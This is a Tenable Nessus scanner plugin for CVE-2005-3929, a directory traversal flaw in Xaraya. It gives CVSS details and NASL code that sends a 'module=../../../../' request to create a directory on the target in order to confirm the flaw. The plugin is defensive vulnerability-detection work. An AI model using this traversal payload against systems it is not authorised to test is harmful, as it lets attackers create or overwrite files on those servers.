5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:L/Au:N/C:N/I:P/A:N
0.027 Low
EPSS
Percentile
90.6%
The version of Xaraya installed on the remote host does not sanitize input to the ‘module’ parameter of the ‘index.php’ script before using it to write to files on the affected host. Using a specially crafted request, an unauthenticated attacker can create directories and possibly overwrite arbitrary files on the affected host subject to the permissions of the web server user id.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(20372);
script_version("1.17");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/06/01");
script_cve_id("CVE-2005-3929");
script_bugtraq_id(15623);
script_xref(name:"EDB-ID", value:"1345");
script_name(english:"Xaraya index.php module Parameter Traversal Arbitrary File/Directory Manipulation");
script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP script that is affected by a
directory traversal flaw.");
script_set_attribute(attribute:"description", value:
"The version of Xaraya installed on the remote host does not sanitize
input to the 'module' parameter of the 'index.php' script before using
it to write to files on the affected host. Using a specially crafted
request, an unauthenticated attacker can create directories and
possibly overwrite arbitrary files on the affected host subject to the
permissions of the web server user id.");
script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/archive/1/418209/100/0/threaded");
script_set_attribute(attribute:"see_also", value:"http://www.xaraya.com/index.php/news/551");
script_set_attribute(attribute:"solution", value:
"Upgrade to Xaraya 1.0.1 or later.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"vuln_publication_date", value:"2005/11/29");
script_set_attribute(attribute:"plugin_publication_date", value:"2006/01/02");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_end_attributes();
script_category(ACT_DESTRUCTIVE_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2006-2022 Tenable Network Security, Inc.");
script_dependencies("xaraya_detection.nasl");
script_require_keys("www/xaraya");
script_exclude_keys("Settings/disable_cgi_scanning");
script_require_ports("Services/www", 80);
exit(0);
}
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
port = get_http_port(default:80);
if (!can_host_php(port:port)) exit(0);
# Test an install.
install = get_kb_item(string("www/", port, "/xaraya"));
if (isnull(install)) exit(0);
matches = eregmatch(string:install, pattern:"^(.+) under (/.*)$");
if (!isnull(matches)) {
dir = matches[2];
# Try to exploit the flaw to create a directory under
# Xaraya's 'var' directory.
dirname = string(SCRIPT_NAME, "-", unixtime());
r = http_send_recv3(method: "GET", port: port,
item:string(
dir, "/index.php?",
"module=../../../../", dirname
));
if (isnull(r)) exit(0);
# There's a problem if the directory was created.
#
# nb: by not tacking on a trailing slash, we'll be able to detect
# whether the directory exists even if, say, Apache's autoindex
# feature is disabled.
r = http_send_recv3(method: "GET", item:string(dir, "/var/", dirname), port:port);
if (egrep(pattern:"^HTTP/.* 301 Moved", string:r[0])) {
security_warning(port);
exit(0);
}
}